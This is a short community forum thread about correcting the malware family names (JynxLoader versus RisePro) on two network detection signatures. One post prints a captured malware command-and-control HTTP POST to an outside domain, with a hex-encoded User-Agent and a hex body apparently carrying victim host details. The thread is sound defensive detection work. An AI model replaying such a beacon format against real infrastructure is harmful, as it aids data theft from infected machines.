# Inconsistency between the rules 2049660 & 2049661 and the family

**URL:** https://community.emergingthreats.net/t/inconsistency-between-the-rules-2049660-2049661-and-the-family/1219
**Category:** Rule Signatures
**Created:** [December 19, 2023, 5:20pm UTC](https://community.emergingthreats.net/t/inconsistency-between-the-rules-2049660-2049661-and-the-family/1219 "2023-12-19T17:20:26Z")
**Posts on this page:** 2
**Page:** 1

<div class="post-metadata">

### Author: ![Jane0sint](https://sea2.discourse-cdn.com/flex016/user_avatar/community.emergingthreats.net/jane0sint/32/398_2.png) [@Jane0sint](https://community.emergingthreats.net/u/Jane0sint)
#### Post date: [December 19, 2023, 5:20pm UTC](https://community.emergingthreats.net/t/inconsistency-between-the-rules-2049660-2049661-and-the-family/1219/1 "2023-12-19T17:20:26Z")

</div>

Hi, there seems to be a little confusion with signatures 2049660 & 2049661, the fact is that it was written in RisePro because the magic and the encrypted bytes 0x36 match its traffic.

 ![image](https://us1.discourse-cdn.com/flex016/uploads/emergingthreats/original/1X/05d95a7843d59a01824b062af43b7bf1b82962a9.jpeg)

> **[Analysis d5c0d9e9b7ab82909616db51853f52fb.exe (MD5:...](https://app.any.run/tasks/57c1a359-db52-4ec7-9302-46ed30301da3/#)**
>
> Interactive malware hunting service. Live testing of most type of threats in any environments. No installation and no waiting necessary.

Best regards, Jane ˶ᵔ ᵕ ᵔ˶

---

<div class="post-metadata">

### Author: ![ishaughnessy](https://sea2.discourse-cdn.com/flex016/user_avatar/community.emergingthreats.net/ishaughnessy/32/491_2.png) [@ishaughnessy](https://community.emergingthreats.net/u/ishaughnessy)
#### Post date: [December 19, 2023, 8:05pm UTC](https://community.emergingthreats.net/t/inconsistency-between-the-rules-2049660-2049661-and-the-family/1219/2 "2023-12-19T20:05:23Z")

</div>

hey Jane!

Thanks for the tip! I originally gave these the JynxLoader names because I saw the traffic stem from d4d464e22776e552d215e5fe39373280 which had the following HTTP request. Notice that the User-Agent is the hex encoded string “JinxV2DEV”.

I just read up on RisePro on the [any.run blog](https://any.run/cybersecurity-blog/risepro-malware-communication-analysis/) and it was very helpful. I’ll get these names updated in today’s release.

```http
POST / HTTP/1.1
Host: essentialdrivers.org
User-Agent: 4a696e785632444556
Content-Length: 234
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

30303430353232383637323737623062363434363836326433333262356637397c33352e3139322e39332e3130377c55537c496e74656c28522920436f726528544d2932204350552036363030204020322e34302047487a7c505441434d3242347c31307c57696e646f777320446566656e646572

```

Happy Holidays! ☃ 🎅 🧝‍♀️ 🎁
